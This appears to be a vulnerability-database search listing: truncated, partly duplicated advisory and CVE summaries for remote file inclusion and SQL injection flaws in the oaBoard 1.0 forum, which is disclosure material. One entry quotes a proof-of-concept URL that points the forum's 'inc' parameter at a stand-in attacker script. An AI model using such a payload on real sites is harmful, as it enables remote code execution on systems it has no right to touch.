25 matches found
EUVD-2005-3393
Malware in sbrugna...
EUVD-2006-0102
Malware in sbrugna...
EUVD-2006-0084
Malware in sbrugna...
OABoard 1.0 Forum Script Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution of...
OaBoard 1.0 Forum.PHP Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/15245/info OaBoard is prone to multiple SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input before using it in an SQL query. Successful exploitation could result in ...
OABOARD Web Forum forum.php inc Parameter PHP Code Execution - Ver2 (CVE-2006-0076)
A code execution vulnerability has been reported in OABoard. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...
OABOARD Web Forum forum.php inc Parameter PHP Code Execution - Ver2 (CVE-2006-0076)
A code execution vulnerability has been reported in OABoard. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...
OaBoard 1.0 Remote File inclusion
OaBoard version 1.x have remote file inclusion . Variables $inc isn't initialized in the include http://host/oaboard/forum.php?inc=http://evilscript/ Hessam-x www.hessamx.net...
CVE-2006-0094
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...
Design/Logic Flaw
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...
CVE-2006-0094
CVE-2006-0094 describes a PHP remote file include in oaBoard 1.0, specifically in forum.php via the inc_stat parameter, enabling remote attackers to execute arbitrary PHP code. The connected documents confirm oaBoard 1.0 as affected and do not provide remediation details. No exploits or fixed ver...
CVE-2006-0076
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter...
Remote file inclusion
PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter...
CVE-2006-0076
This CVE (CVE-2006-0076) relates to oaBoard 1.0: a PHP remote file inclusion flaw in forum.php where an input parameter inc can be controlled via URL to include a PHP file. The underlying issue is unsafely including external input as code, enabling arbitrary PHP execution if a remote file is incl...
[eVuln] oaBoard PHP Code Execution
New eVuln Advisory: oaBoard PHP Code Execution --------------------Summary---------------- Software: oaBoard Versions: 1.0 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu [email protected]...
EV0003.txt
New eVuln Advisory: oaBoard PHP Code Execution --------------------Summary---------------- Software: oaBoard Versions: 1.0 Critical Level: Dangerous Type: PHP Code Execution Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu [email protected]...
OABoard 1.0 Forum - Remote File Inclusion
OABoard 1.0 Forum - Remote File Inclusion source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution ...
OABoard 1.0 Forum - Remote File Inclusion
source: https://www.securityfocus.com/bid/16105/info The oaBoard application is prone to a remote file-include vulnerability. As a result, remote users may specify external PHP scripts to be included by the application. This could result in the execution of arbitrary PHP code in the context of th...
CVE-2005-3394
Multiple SQL injection vulnerabilities in forum.php in oaboard forum 1.0 allow remote attackers to execute arbitrary SQL commands via the 1 channel parameter in the topics module and 2 topic parameter in the posting module...
CVE-2005-3394
Multiple SQL injection vulnerabilities in forum.php in oaboard forum 1.0 allow remote attackers to execute arbitrary SQL commands via the 1 channel parameter in the topics module and 2 topic parameter in the posting module...